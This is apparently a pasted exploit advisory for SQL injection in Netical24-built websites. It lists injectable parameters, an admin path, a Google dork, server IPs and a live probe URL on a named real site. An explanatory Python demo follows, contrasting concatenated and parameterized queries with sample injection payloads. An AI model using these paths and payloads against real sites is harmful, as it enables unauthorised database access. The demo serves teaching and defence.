KingSkrupellos

Netical24 Web Design SQL Injection

Jan 9th, 2019
######################################################
 
# Exploit Title : Netical24 Web Design SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 10/01/2019
# Vendor Homepage : netical24.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : Diseño y Desarrollo Web:Netical24
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-netical24-web-design-sql-injection-vulnerability.html
 
######################################################
 
# Admin Panel Login Path :
*************************
 
/admin
 
# SQL Injection Exploit :
***********************
 
/ver_noticia.php?id=[SQL Injection]
 
/ver_documento.php?id=[SQL Injection]
 
/ver_convenio.php?id=[SQL Injection]
 
/ver_circular.php?id=[SQL Injection]
 
/ver_evento.php?id=[SQL Injection]
 
/formacion.php?t=[SQL Injection]
 
######################################################
 
# Example Vulnerable Site :
*************************
 
Note : (212.18.224.226) => There are 148 domains hosted on this server.
 
Note : (109.73.169.144) => There are 132 domains hosted on this server.
 
[+] trabajosocialleon.org/ver_noticia.php?id=93%27 =>
 
[ Proof of Concept ] => archive.fo/ZnYWd
 
######################################################
 
# SQL Database Error :
**********************
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for
the right syntax to use near '\'' at line 1
 
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '\' AND
public=1 AND finalizado=0 ORDER BY fecha DESC' at line 1
 
Note : The second message echoes the remainder of the statement after the injection point, so the id value is placed directly into the WHERE clause and is followed by AND public=1 AND finalizado=0 ORDER BY fecha DESC. Raw MySQL errors are rendered in the page, which is why a single quote appended to the parameter (id=93%27) is enough to confirm the injection.
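 
The following is an added example, not code from the advisory or from Netical24. It reconstructs the query shape leaked by the error above (a user-supplied id inside the WHERE clause, followed by AND public=1 AND finalizado=0 ORDER BY fecha DESC) on an in-memory SQLite table standing in for MySQL, and places the parameterized form beside it. The table name noticias, the column titulo and the sample rows are assumptions; public, finalizado and fecha come from the error text.

```python
import sqlite3

# Constructed sample data (not taken from any real site): one visible
# notice, one draft that must stay hidden, one closed notice.
ROWS = [
    (93, "Public notice", 1, 0, "2019-01-08"),
    (94, "Draft, not public", 0, 0, "2019-01-09"),
    (95, "Closed notice", 1, 1, "2019-01-07"),
]


def open_db():
    """Build an in-memory SQLite stand-in for the MySQL table behind ver_noticia.php."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE noticias (id INTEGER, titulo TEXT, public INTEGER, "
        "finalizado INTEGER, fecha TEXT)"
    )
    conn.executemany("INSERT INTO noticias VALUES (?,?,?,?,?)", ROWS)
    return conn


def ver_noticia_vulnerable(conn, id_param):
    """Vulnerable pattern: the request parameter is concatenated into the SQL text.

    The shape (id value, then AND public=1 AND finalizado=0 ORDER BY fecha DESC)
    is inferred from the MySQL error message quoted in the advisory; the
    quoting of the id value is an assumption.
    """
    sql = (
        "SELECT id, titulo FROM noticias WHERE id='" + id_param +
        "' AND public=1 AND finalizado=0 ORDER BY fecha DESC"
    )
    return conn.execute(sql).fetchall()


def ver_noticia_safe(conn, id_param):
    """Hardened form: same query, but the value travels as a bound parameter."""
    sql = (
        "SELECT id, titulo FROM noticias WHERE id=? "
        "AND public=1 AND finalizado=0 ORDER BY fecha DESC"
    )
    return conn.execute(sql, (id_param,)).fetchall()


def probe(func, conn, id_param):
    """Run one handler on one input and report ('ok', rows) or ('error', message).

    'error' on a lone quote is the signature the advisory relies on; an 'ok'
    result that includes hidden rows shows the filter has been bypassed.
    """
    try:
        return ("ok", func(conn, id_param))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = open_db()
    for value in ("93", "93'", "x' OR 1=1 --"):
        print(repr(value))
        print("  vulnerable:", probe(ver_noticia_vulnerable, conn, value))
        print("  safe      :", probe(ver_noticia_safe, conn, value))
```

With the plain value 93 both handlers return the public notice. With 93' the concatenating handler raises a syntax error (the SQLite counterpart of the MySQL message above) while the parameterized one simply matches nothing. With x' OR 1=1 -- the concatenating handler comments out the public and finalizado filters and returns every row, including the draft; the parameterized handler still returns nothing.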
 
######################################################
 
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
 
######################################################